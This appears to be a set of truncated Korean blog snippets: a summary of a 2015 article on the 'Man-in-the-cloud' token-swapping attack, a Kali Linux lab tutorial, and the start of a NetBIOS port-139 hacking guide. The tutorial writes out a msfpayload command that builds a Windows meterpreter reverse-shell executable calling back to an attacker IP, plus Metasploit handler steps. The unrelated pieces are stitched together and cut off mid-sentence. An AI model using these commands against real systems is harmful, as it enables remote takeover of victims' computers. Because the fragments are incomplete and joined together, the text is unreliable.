2015년 8월 6일자 보안뉴스의 “해킹의 진화 : 저렴하고 강력한 Man-in-the-cloud 발견!”이라는 기사가 눈길을 끌었습니다. Man-in-the-cloud는 클라우드기반의 서버를 공략하여 동기화한 후 피해자 시스템의 레지스트리에서 가짜 토큰을 지워내고 사용자의 진짜 토큰을 다시 삽입해 넣기때문에 로그파일을 한줄 한줄 꼼꼼히 살펴보지 않는 한 알아채기 힘든 공략 방식입니다. 1. 공격자는 피해자에게 사회공학적 해킹 방법을 사용하여 드라이브 응용프로그램의
Kali Linux를 이용한 모의해킹 모의해킹 환경 VirtualBox 에 네트워크 브릿지로 연결됨 Kali Linux IP : 192.168.0.19 Windows 8.1 IP : 192.168.0.11 해킹을 위한 파일 생성 먼저 Kali linux에서 hacking.exe 파일을 생성합니다. # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.19 LPORT=4444 x> hacking.exe Hacking.exe 파일을 윈도우에 복사합니다. Metasploit 실행 # msfconsole msf> use exploit/multi/handler msf>
OPEN PORT 139,138,136,135 AND HACKING 설치(Windows) 먼저 아래의 툴을 다운로드 받는다. USER2SID & SID2USER NetBios Auditing Tool 사용 방법 Nmap Tool을 사용하여 Port Scanning을 합니다.( 'Nmap 설치가이드'를 참조하세요.) 대상 PC 192.168.0.XX에서 139번 포트가 열린 것이 확인됩니다. 다운로드 받은 파일을 C: 드라이브에 풀어놓습니다. cmd창을 열어 현재 연결 상태를 확인하겠습니다. C:UsersAdminstrator>net use 새 연결 정보가 저장됩니다. 목록에 항목이
